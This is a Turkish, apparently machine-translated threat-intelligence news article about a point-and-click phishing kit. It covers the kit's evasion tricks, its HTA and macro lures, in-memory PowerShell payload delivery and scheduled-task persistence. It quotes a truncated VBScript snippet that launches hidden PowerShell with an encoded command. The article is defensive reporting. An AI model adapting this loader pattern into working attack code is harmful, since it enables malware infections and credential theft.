Tehdit aktörlerinin minimum teknik uzmanlıkla sofistike yemler üretmesini sağlayan yeni bir kimlik avı kiti ortaya çıktı.
Bu “nokta ve tıklatın” araç seti, sezgisel bir web arayüzünü güçlü yük yükü dağıtım mekanizmalarıyla birleştirir.
Saldırganlar önceden yapılandırılmış şablonlardan seçim yapabilir, marka öğelerini özelleştirebilir ve belirli kuruluşları veya bireyleri hedefleyebilir.
Bir kimlik avı sayfası konuşlandırıldıktan sonra, mağdurlara, gerçekte kötü amaçlı kodun teslimini tetikleyen görünüşte zararsız indirme istemleri ile sunulur.
.webp)
İlk olaylar, Microsoft Office belgeleri ve HTML uygulamaları gibi ortak dosya formatlarını kullanan kiti göstermektedir.
Açıldıktan sonra, belgeler kullanıcıları makroları etkinleştirmeye veya gömülü komut dosyalarının yürütülmesine izin vermeye iter.
Yerleşik komut dosyası motorlarına ağır kaldırmayı dış kaynaklardan sağlayan Kit, yükleri anında oluşturur ve birçok statik imza tabanlı savunma etkisiz hale getirir.
İlk kampanya verileri, sosyal mühendislik öğelerinin son derece ikna edici olduğunu düşündüren önemli bir tıklama oranını göstermektedir.
Anormal.Ai analistleri, kitin açılış sayfalarının, kaynak tanımlayıcılarını birkaç dakikada bir döndürerek URL filtreleme çözümlerinden kaçmak için dinamik içerik enjeksiyonu kullandığını belirtti.
Bu yaklaşım, otomatik tarayıcıları hayal kırıklığına uğratır ve kurban makinelerinde uzun süreli konut süresine katkıda bulunur ve gizli yük evreleme ve yürütülmesine izin verir.
Araştırmacılar, yük indirme URL’lerinin çok aşamalı yönlendirmelerin arkasına gizlendiği ve son getirme işlemine kadar gerçek hedeflerini gizlediği durumları belirlediler.
Ayrıca, anormal.Ai araştırmacıları, mağdur içerik yürütmeyi sağladıktan sonra, gömülü komut dosyasının, son yükü uzak bir sunucudan elde eden ve yürüten bir PowerShell One-Liner yürüttüğünü belirledi.
Bu PowerShell komutu Base64’te gizlenir ve çoğu sezgisel motoru atlayarak sıkıştırılmış bir arşive sarılır. Süreç minimal kullanıcı etkileşimi ve görünür pencerelerle çalıştıkça mağdurlar farkında değiller.
Enfeksiyon mekanizmasının derinlemesine incelenmesi
Kitin enfeksiyon zincirinin kalbinde, ilk yükleyici görevi gören bir HTML uygulaması (HTA) modülü bulunur.
.webp)
Mağdur “Düzenlemeyi Etkinleştir” veya “Engelli İçeriğe İzin Ver” i tıkladığında, HTA dosyası yürütülür:-
[script language="VBScript"]
Dim objShell
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " & _
"JABlAHgAZQBjAGUAbQBUAG8ARABvAHcAbgBsAG8AZABGAGUAcgBfAFIAZQBzAG8AdQByAGMAZQA9ICJuU0M…"
[/script]Bu snippet, şifrelenmiş bir ikili indiren, belleğe şifresini çözen ve doğrudan RAM’den yürüten bir PowerShell yükünü çözer.
Bellekte çalışarak kit, dosya tabanlı algılamayı baltalayarak diske kötü amaçlı dosyalar yazmaktan kaçınır.
İndirilen ikili, modüler bir yükleyici olarak işlev görür, kimlik bilgisi çalanlar veya fidye yazılımı damlaları gibi ek bileşenler getirir.
Kalıcılık, girişli kullanıcı bağlamında her saat yükleyiciyi yeniden başlatan gizli bir planlanmış görev oluşturarak elde edilir.
Bu taktik, ilk belge kapalı olsa veya makine yeniden başlatılmış olsa bile erişimin devam etmesini sağlar. Planlanan görev adı, her kampanya için randomize edilir ve manuel algılama çabalarını karmaşıklaştırır.
Genel olarak, bu nokta ve tıklama kimlik avı kiti, kullanıcı dostu arayüzleri gelişmiş kaçırma ve yük dağıtım teknikleri ile birleştirerek erişilebilir saldırı yeteneklerinde önemli bir artışı temsil eder.
Siber güvenlik ekipleri, anormal görev zamanlayıcı girişleri ve olağandışı HTA yürütmeleri için izlemeye öncelik vermeli ve aynı zamanda güvenilmeyen belgelerdeki içeriği etkinleştirme konusundaki kullanıcı eğitimini güçlendirmelidir.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
